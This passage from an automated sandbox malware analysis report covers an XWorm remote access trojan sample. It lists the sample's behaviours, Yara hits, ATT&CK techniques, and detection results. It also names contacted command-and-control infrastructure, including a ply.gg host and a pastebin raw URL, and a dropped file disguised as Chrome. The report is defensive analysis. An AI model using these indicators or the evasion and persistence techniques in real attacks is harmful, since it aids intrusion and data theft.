            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\Desktop\ra66DSpa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: ra66DSpa.exe, 00000000.00000002.3383710805.000000001BAD4000.00000004.00000020.00020000.00000000.sdmp, ra66DSpa.exe, 00000000.00000002.3347083879.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, ra66DSpa.exe, 00000000.00000002.3347083879.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\ra66DSpa.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\ra66DSpa.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\ra66DSpa.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: ra66DSpa.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ra66DSpa.exe PID: 4540, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: ra66DSpa.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ra66DSpa.exe PID: 4540, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping221
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		1
            DLL Side-Loading            		1
            Registry Run Keys / Startup Folder            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture1
            Ingress Tool Transfer            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input Capture13
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525343 Sample: ra66DSpa.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 40 pastebin.com 2->40 42 stay-brook.gl.at.ply.gg 2->42 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 56 14 other signatures 2->56 8 ra66DSpa.exe 15 5 2->8         started        13 Google Chrome.exe 2->13         started        15 Google Chrome.exe 2->15         started        17 2 other processes 2->17 signatures3 54 Connects to a pastebin service (likely for C&C) 40->54 process4 dnsIp5 44 stay-brook.gl.at.ply.gg 147.185.221.21, 42956, 53844, 53845 SALSGIVERUS United States 8->44 46 pastebin.com 104.20.4.235, 443, 53843 CLOUDFLARENETUS United States 8->46 38 C:\Users\user\AppData\...behaviorgraphoogle Chrome.exe, PE32 8->38 dropped 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->60 62 Protects its processes via BreakOnTermination flag 8->62 64 Bypasses PowerShell execution policy 8->64 66 2 other signatures 8->66 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 file6 signatures7 process8 signatures9 58 Loading BitLocker PowerShell Module 19->58 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ra66DSpa.exe68%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            ra66DSpa.exe100%AviraTR/Spy.Gen
            ra66DSpa.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Google Chrome.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Google Chrome.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Google Chrome.exe68%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            stay-brook.gl.at.ply.gg
            		147.185.221.21
            		truetrue
              		unknown
              pastebin.com
              		104.20.4.235
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://pastebin.com/raw/hhG5zGXdtrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.microsoft.copowershell.exe, 00000005.00000002.2283007874.000001B4F371A000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.micpowershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.micft.cMicRosofpowershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namera66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://pastebin.comra66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.20.4.235
                              		pastebin.comUnited States
                              		13335CLOUDFLARENETUStrue
                              147.185.221.21
                              		stay-brook.gl.at.ply.ggUnited States
                              		12087SALSGIVERUStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1525343
                              Start date and time:2024-10-04 01:46:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 44s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
